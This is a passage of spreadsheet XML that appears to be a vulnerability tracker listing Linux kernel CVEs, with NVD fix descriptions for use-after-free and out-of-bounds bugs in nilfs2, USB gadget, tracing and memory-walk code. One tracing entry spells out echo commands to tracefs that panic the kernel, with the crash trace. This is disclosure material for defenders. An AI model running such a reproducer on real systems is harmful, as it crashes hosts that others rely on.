          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P414" s="5" t="inlineStr"/>
      <c r="Q414" s="5" t="inlineStr"/>
      <c r="R414" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nilfs2: fix slab-out-of-bounds in nilfs_direct_propagate after truncation
Shuangpeng Bai reported that KASAN detected a slab-out-of-bounds error
in nilfs_direct_propagate() during testing.
Analysis revealed that after truncating a file, a node block immediately
below the B-tree root was not deleted.  Instead, it remained in the B-tree
node cache in a dirty state.  The log writer subsequently detected this
block and incorrectly invoked nilfs_direct_propagate() on it, which is
designed to handle only data blocks in direct mapping.
B-tree nodes in the cache are managed by virtual block numbers, and their
logical keys typically exceed the range expected by direct mapping.
Consequently, processing such a node as a direct mapping entry triggers
a slab-out-of-bounds access.
The root cause is that when a B-tree mapping collapses into a direct
mapping during truncation, an intermediate node block pointed to by the
root node is left behind as garbage instead of being explicitly deleted.
This resolves the issue by adding a nilfs_btree_discard() operation
to delete the remaining intermediate node block during the conversion.
A 'deform' flag is added to the bop_delete interface to explicitly signal
that the deletion is part of a mapping transformation.  This allows the
B-tree mapping implementation to perform the necessary cleanup and
discarding of the residual node structure that would be otherwise be left
orphaned after the transition.</t>
        </is>
      </c>
      <c r="S414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89723</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89724</t>
        </is>
      </c>
      <c r="D415" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E415" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F415" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I415" s="5" t="inlineStr"/>
      <c r="J415" s="5" t="inlineStr"/>
      <c r="K415" s="5" t="inlineStr"/>
      <c r="L415" s="5" t="inlineStr"/>
      <c r="M415" s="5" t="inlineStr"/>
      <c r="N415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O415" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr"/>
      <c r="Q415" s="5" t="inlineStr"/>
      <c r="R415" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: vicodec: fix out-of-bounds write in FWHT encoder
vidioc_s_fmt_vid_out() sizes the encoder CAPTURE buffer from the
compressed descriptor pixfmt_fwht, whose sizeimage_mult is 3:
coded_w * coded_h * 3 + sizeof(struct fwht_cframe_hdr). fwht_encode_frame()
encodes one plane per component, and an incompressible plane takes the
FWHT_FRAME_UNENCODED path in encode_plane(), copying the plane verbatim.
For a 4-component pixel format all four planes are full resolution
(width_div == height_div == 1), so a frame that forces every plane
through the unencoded fallback writes
sizeof(struct fwht_cframe_hdr) + 4 * coded_w * coded_h bytes, overrunning
the plane by coded_w * coded_h, which can result in corruption
of adjacent kernel heap memory.
Bump pixfmt_fwht.sizeimage_mult from 3 to 4, matching the largest
components_num among the supported raw formats, so the capture buffer is
always large enough for the unencoded fallback.</t>
        </is>
      </c>
      <c r="S415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89724</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89733</t>
        </is>
      </c>
      <c r="D416" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E416" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F416" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr"/>
      <c r="K416" s="5" t="inlineStr"/>
      <c r="L416" s="5" t="inlineStr"/>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P416" s="5" t="inlineStr"/>
      <c r="Q416" s="5" t="inlineStr"/>
      <c r="R416" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: uvc: fix dangling pointers in uvc_function_bind() and uvc_function_unbind()
In uvc_function_bind() error path, we use usb_ep_free_request which
uses uvc-&gt;control_req but does not set it to NULL afterwards. Thus,
uvc-&gt;control_req is a dangling pointer causing a UAF. Also we do not set
the uvc-&gt;control_buf pointer to NULL after freeing it, which is another
dangling pointer. Fix it by setting uvc-&gt;control_req to NULL after we run
usb_ep_free_request() and uvc-&gt;control_buf to NULL after kfree. Do the
same for uvc_function_unbind().</t>
        </is>
      </c>
      <c r="S416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89733</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89736</t>
        </is>
      </c>
      <c r="D417" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E417" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F417" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr"/>
      <c r="L417" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr"/>
      <c r="Q417" s="5" t="inlineStr"/>
      <c r="R417" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: u_audio: Fix use-after-free on sound card disconnect
g_audio_cleanup() invokes snd_card_free_when_closed() to initiate sound
card teardown and immediately frees the underlying struct snd_uac_chip
context. However, snd_card_free_when_closed() returns asynchronously
while ALSA control elements (kctls) remain open in userspace.
When userspace control applications access or close these open file
descriptors, kctl callbacks attempt to dereference kctl-&gt;private_data
pointing to &amp;uac-&gt;c_prm or &amp;uac-&gt;p_prm within the freed uac structure,
resulting in a use-after-free (UAF) memory corruption.
Fix this issue by deferring the destruction of struct snd_uac_chip until
all references to the ALSA sound card are released. Register a custom
card-&gt;private_free callback (u_audio_card_free) during g_audio_setup()
that frees uac and its associated playback/capture request and ring
buffers only when the sound card reference count drops to zero.</t>
        </is>
      </c>
      <c r="S417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89736</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89738</t>
        </is>
      </c>
      <c r="D418" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E418" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F418" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr"/>
      <c r="K418" s="5" t="inlineStr"/>
      <c r="L418" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P418" s="5" t="inlineStr"/>
      <c r="Q418" s="5" t="inlineStr"/>
      <c r="R418" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: at91_udc: drain polled-VBUS timer/work before udc is freed
In polled-VBUS mode (board.vbus_pin &amp;&amp; board.vbus_polled), probe arms a
self-restarting cycle: at91_vbus_timer() schedules vbus_timer_work, and
at91_vbus_timer_work() calls at91_vbus_update() and re-arms the timer via
mod_timer(). Both recover the same udc through container_of and dereference
it on every iteration.
Neither teardown path cancels this cycle. udc is devm-allocated, so it is
freed after at91udc_remove() returns, and is likewise freed when probe
fails and devres runs. A timer callback or work item that is pending or
running at either point dereferences the freed udc.
Add at91_udc_shutdown_vbus_timer() and call it from at91udc_remove() and
from the usb_add_gadget_udc() failure path in probe; the remaining probe
error paths fail before the timer is armed. timer_shutdown_sync() waits
for a running callback and clears timer-&gt;function, which makes the work
handler's mod_timer() a permanent no-op; cancel_work_sync() then drains
any pending or running work whose re-arm attempt now does nothing. The
timer must be shut down first, since cancelling the work alone would let
the timer re-queue it. The guard mirrors probe: in IRQ mode the timer and
work_struct are never initialized.
This does not require a fault; a normal driver unbind can interleave with
an already queued work item.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89738</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89741</t>
        </is>
      </c>
      <c r="D419" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E419" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F419" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G419" s="5" t="inlineStr"/>
      <c r="H419" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I419" s="5" t="inlineStr"/>
      <c r="J419" s="5" t="inlineStr"/>
      <c r="K419" s="5" t="inlineStr"/>
      <c r="L419" s="5" t="inlineStr"/>
      <c r="M419" s="5" t="inlineStr"/>
      <c r="N419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O419" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P419" s="5" t="inlineStr"/>
      <c r="Q419" s="5" t="inlineStr"/>
      <c r="R419" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Revert "media: v4l2-dev: fix error handling in __video_register_device()"
This reverts commit 2a934fdb01db6458288fc9386d3d8ceba6dd551a.
The intentions of that patch were good, but it doesn't work.
The idea is that if device_register fails, you have to do a put_device
to let the ref counter release resources.
However, the V4L2 API says that if video_register_device() fails, then
you have to call video_device_release(), which kfree()s the video_device
struct.
But the put_device() will already have freed the struct, so you end
up in a double-free scenario.
There is not really a good way of fixing this without breaking
video_register_device() into two parts, one that initializes everything,
and one that does the actual device_register, and then converting all
V4L2 drivers to this new model.
That is a massive job, and it is very unlikely that device_register
will fail.
So rather than ending up in a double-free scenario, just revert this
patch, and in that case we'll have a small memory leak. Which is a lot
more robust.</t>
        </is>
      </c>
      <c r="S419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89741</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89742</t>
        </is>
      </c>
      <c r="D420" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E420" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F420" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I420" s="5" t="inlineStr"/>
      <c r="J420" s="5" t="inlineStr"/>
      <c r="K420" s="5" t="inlineStr"/>
      <c r="L420" s="5" t="inlineStr"/>
      <c r="M420" s="5" t="inlineStr"/>
      <c r="N420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O420" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P420" s="5" t="inlineStr"/>
      <c r="Q420" s="5" t="inlineStr"/>
      <c r="R420" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
rapidio: mport_cdev: fix use-after-free in dma_req_free()
dma_req_free() acquires buf_mutex through req-&gt;map, drops the mapping
reference with kref_put(), and then dereferences req-&gt;map again to unlock
the mutex.
If kref_put() drops the last reference, mport_release_mapping() frees the
mapping, and the subsequent mutex_unlock() dereferences a freed object. 
This is a use-after-free.
Fix this by caching map and md before kref_put(), clearing req-&gt;map while
holding buf_mutex, and using the cached md for mutex unlocking.
The bug is reachable from userspace via the RapidIO mport character device
interface.</t>
        </is>
      </c>
      <c r="S420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89742</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89746</t>
        </is>
      </c>
      <c r="D421" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E421" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F421" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G421" s="5" t="inlineStr"/>
      <c r="H421" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I421" s="5" t="inlineStr"/>
      <c r="J421" s="5" t="inlineStr"/>
      <c r="K421" s="5" t="inlineStr"/>
      <c r="L421" s="5" t="inlineStr"/>
      <c r="M421" s="5" t="inlineStr"/>
      <c r="N421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O421" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P421" s="5" t="inlineStr"/>
      <c r="Q421" s="5" t="inlineStr"/>
      <c r="R421" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Fix use-after-free with same-name named triggers
When two hist triggers on different events are registered with the same
name=, the second one reuses the first as named_data.  Both are added to
tr-&gt;hist_vars by save_hist_vars() during event_hist_trigger_parse(),
because save_hist_vars() is called before event_trigger_register() while
the named reuse is only detected later, in hist_register_trigger().
In the named-data branch hist_register_trigger() then frees the second
histogram's hist_data via destroy_hist_data(), but never removes its
tr-&gt;hist_vars list entry, leaving a dangling pointer and leaking the
trace_array reference it holds.
A later hist trigger that references a variable makes find_var_file()
walk tr-&gt;hist_vars and dereference the freed hist_data.  The bug is
reproducible from userspace by writing three hist triggers to tracefs:
  cd /sys/kernel/tracing
  echo 'hist:keys=common_pid:x=common_pid:name=mh' &gt; events/sched/sched_switch/trigger
  echo 'hist:keys=common_pid:x=common_pid:name=mh' &gt; events/sched/sched_process_fork/trigger
  echo 'hist:keys=common_pid:vals=$x' &gt; events/sched/sched_process_exit/trigger
The third write panics the kernel:
  BUG: KASAN: slab-use-after-free in find_var_file.part.0+0x272/0x290
  Read of size 8 at addr ffff888001f8a0e0 by task sh/1
  CPU: 1 UID: 0 PID: 1 Comm: sh Tainted: G      D          N
  Call Trace:
    find_var_file.part.0
    find_event_var
    parse_atom
    parse_expr
    __create_val_field
    event_hist_trigger_parse
    trigger_process_regex
    event_trigger_write
    vfs_write
    ksys_write
    do_syscall_64
    entry_SYSCALL_64_after_hwframe
  Allocated by task 1:
    event_hist_trigger_parse
  Freed by task 1:
    hist_register_trigger+0x618/0xa30
    event_hist_trigger_parse
  The buggy address belongs to freed 2048-byte region
  Oops: general protection fault ... RIP: find_var_file.part.0
  Kernel panic - not syncing: Attempted to kill init! exitcode=0x0000000b
Fix by removing the hist_data from tr-&gt;hist_vars and releasing the
trace_array reference in the named-data branch of hist_register_trigger()
before freeing the hist_data.</t>
        </is>
      </c>
      <c r="S421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89746</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89747</t>
        </is>
      </c>
      <c r="D422" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E422" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F422" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I422" s="5" t="inlineStr"/>
      <c r="J422" s="5" t="inlineStr"/>
      <c r="K422" s="5" t="inlineStr"/>
      <c r="L422" s="5" t="inlineStr"/>
      <c r="M422" s="5" t="inlineStr"/>
      <c r="N422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O422" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P422" s="5" t="inlineStr"/>
      <c r="Q422" s="5" t="inlineStr"/>
      <c r="R422" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Fix use-after-free in trace_pipe read on sub-buffer order change
Writing to buffer_subbuf_size_kb calls ring_buffer_subbuf_order_set(),
which frees every sub-buffer of the ring buffer, including the reader
page, and replaces them with newly allocated ones.
Readers of trace_pipe hold pointers into those pages. ring_buffer_peek()
looks up an event under cpu_buffer-&gt;reader_lock but returns the event
pointer after dropping the lock, and peek_next_entry() then calls
ring_buffer_event_length() and ring_buffer_event_data() on it. If the
sub-buffer order is changed in that window, the reader dereferences
freed memory:
  BUG: KASAN: use-after-free in ring_buffer_peek+0x3e0/0x430
  Read of size 1 at addr ffff88802a4cf010 by task syz-executor989/6002
  Freed by:
   free_buffer_page kernel/trace/ring_buffer.c:398 [inline]
   ring_buffer_subbuf_order_set+0x1325/0x18e0 kernel/trace/ring_buffer.c:7444
   buffer_subbuf_size_write+0x182/0x280 kernel/trace/trace.c:8221
Take trace_access_lock(RING_BUFFER_ALL_CPUS) around the order change.
This is the lock trace_pipe readers already hold across their entire
peek-and-print loop, so the swap can no longer race with a reader that
is dereferencing a peeked event.</t>
        </is>
      </c>
      <c r="S422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89747</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89748</t>
        </is>
      </c>
      <c r="D423" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E423" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F423" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G423" s="5" t="inlineStr"/>
      <c r="H423" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I423" s="5" t="inlineStr"/>
      <c r="J423" s="5" t="inlineStr"/>
      <c r="K423" s="5" t="inlineStr"/>
      <c r="L423" s="5" t="inlineStr"/>
      <c r="M423" s="5" t="inlineStr"/>
      <c r="N423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O423" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P423" s="5" t="inlineStr"/>
      <c r="Q423" s="5" t="inlineStr"/>
      <c r="R423" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Fix retry exhaustion in simple ring buffer reader swap
simple_ring_buffer_swap_reader_page() starts with retry set to 8 and
post-decrements it only after a failed link replacement. On the final
attempt, a successful replacement leaves retry at zero, while a failed
replacement leaves it at -1.
The current !retry test reverses both outcomes. It returns an error after
a successful final replacement, leaving the link update complete but the
reader bookkeeping unfinished. After a failed final replacement, it
falls through and updates the head and reader pointers as though the
replacement succeeded, which can corrupt the ring.
Treat only a negative counter as exhaustion and return the documented
-EBUSY error.</t>
        </is>
      </c>
      <c r="S423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89748</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89750</t>
        </is>
      </c>
      <c r="D424" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E424" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F424" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G424" s="5" t="inlineStr"/>
      <c r="H424" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I424" s="5" t="inlineStr"/>
      <c r="J424" s="5" t="inlineStr"/>
      <c r="K424" s="5" t="inlineStr"/>
      <c r="L424" s="5" t="inlineStr"/>
      <c r="M424" s="5" t="inlineStr"/>
      <c r="N424" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O424" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P424" s="5" t="inlineStr"/>
      <c r="Q424" s="5" t="inlineStr"/>
      <c r="R424" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing/user_events: Clear copied tracing state before fork duplication
dup_task_struct() copies user_event_mm from the parent into the child,
without grabbing a reference to it. user_event_mm_dup() should
replace it, but it leaves that copied pointer unmodified if
user_event_mm_alloc() fails.
When the child exits, user_event_mm_remove() decrements a reference
the child never owned, which ultimately frees user_event_mm, while
the parent still as a stale pointer to it. This creates a UAF, which
KASAN reports as:
    BUG: KASAN: slab-use-after-free in
    current_user_event_mm+0x51/0x1d0 Write of size 4 at addr
    ffff888005010d30 by task init/44
    Call Trace:
     &lt;TASK&gt;
     kasan_report+0xce/0x100
     kasan_check_range+0x10f/0x1e0
     current_user_event_mm+0x51/0x1d0
     user_events_ioctl+0x82e/0x15c0
     __x64_sys_ioctl+0x139/0x1c0
     do_syscall_64+0xce/0x450
     entry_SYSCALL_64_after_hwframe+0x77/0x7f
    Allocated by task 44:
     __kasan_kmalloc+0x8f/0xa0
     __kmalloc_cache_noprof+0x180/0x3a0
     user_event_mm_alloc+0x3c/0x1f0
     current_user_event_mm+0x88/0x1d0
    Freed by task 42:
     __kasan_slab_free+0x43/0x70
     kfree+0x13a/0x390
     process_one_work+0x696/0xf90
     worker_thread+0x420/0xba0
The fix simply clears the copied pointer before any possible failure.
In case of failure, the child then has nothing to free.</t>
        </is>
      </c>
      <c r="S424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89750</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89754</t>
        </is>
      </c>
      <c r="D425" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E425" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F425" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G425" s="5" t="inlineStr"/>
      <c r="H425" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I425" s="5" t="inlineStr"/>
      <c r="J425" s="5" t="inlineStr"/>
      <c r="K425" s="5" t="inlineStr"/>
      <c r="L425" s="5" t="inlineStr"/>
      <c r="M425" s="5" t="inlineStr"/>
      <c r="N425" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O425" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P425" s="5" t="inlineStr"/>
      <c r="Q425" s="5" t="inlineStr"/>
      <c r="R425" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/pagewalk: fix stale walk-&gt;action escaping walk_pmd_range()
If -&gt;pmd_entry() sets walk-&gt;action = ACTION_AGAIN, the pmd_none() check is
retried.  The PMD entry may be cleared at the point of retry.
In this case, if walk-&gt;ops-&gt;install_pte is not specified, the code
continues to the next PMD entry in the range without resetting
walk-&gt;action to ACTION_SUBTREE.
This leaves walk-&gt;action erroneously set to ACTION_AGAIN, which is
incorrect.
This was incorrect but not problematic up until commit 3b89863c3fa4
("mm/pagewalk: fix race between concurrent split and refault") which
updated walk_pud_range() to check for walk-&gt;action == ACTION_AGAIN upon
walk_pmd_range()'s return, causing the PUD walk to be retried.
In this case this results in duplicate walk callbacks being invoked,
which is erroneous and will break any caller that is not idempotent
with respect to this (and waste time for those which are).  The result
is an out-of-bounds write, triggered by a local fuzzer:
[    2.272695] ==================================================================
[    2.273471] BUG: KASAN: slab-out-of-bounds in __mincore_unmapped_range+0x14f/0x190
[    2.274302] Write of size 1 at addr ffff888008d9b000 by task poc/106
[    2.274966]
[    2.275154] CPU: 0 UID: 1000 PID: 106 Comm: poc Not tainted 7.2.0-rc6-00429-ga7c7074b58d2 #55 PREEMPT(lazy)
[    2.275159] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[    2.275164] Call Trace:
[    2.275170]  &lt;TASK&gt;
[    2.275172]  dump_stack_lvl+0x53/0x70
[    2.275200]  print_report+0xd0/0x630
[    2.275210]  ? __pfx__raw_spin_lock_irqsave+0x10/0x10
[    2.275219]  ? irqentry_exit+0xd2/0x670
[    2.275224]  ? irqentry_exit+0xd2/0x670
[    2.275226]  ? __virt_addr_valid+0xef/0x1a0
[    2.275239]  ? __mincore_unmapped_range+0x14f/0x190
[    2.275242]  kasan_report+0xce/0x100
[    2.275245]  ? __mincore_unmapped_range+0x14f/0x190
[    2.275248]  __mincore_unmapped_range+0x14f/0x190
[    2.275252]  mincore_unmapped_range+0x45/0x70
[    2.275254]  walk_pgd_range+0xafc/0xfc0
[    2.275261]  ? __pfx_walk_pgd_range+0x10/0x10
[    2.275264]  ? __update_load_avg_se+0x3d1/0x670
[    2.275275]  __walk_page_range+0xc0/0x310
[    2.275278]  ? __pfx_find_vma+0x10/0x10
[    2.275281]  ? finish_task_switch.isra.0+0x16d/0x4f0
[    2.275290]  walk_page_range_mm_unsafe+0x26f/0x3a0
[    2.275293]  ? __pfx_mtree_load+0x10/0x10
[    2.275298]  ? __pfx_walk_page_range_mm_unsafe+0x10/0x10
[    2.275302]  ? __free_frozen_pages+0x54d/0x7e0
[    2.275308]  __do_sys_mincore+0x132/0x380
[    2.275311]  do_syscall_64+0xf9/0x540
[    2.275316]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[    2.275322] RIP: 0033:0x422ccd
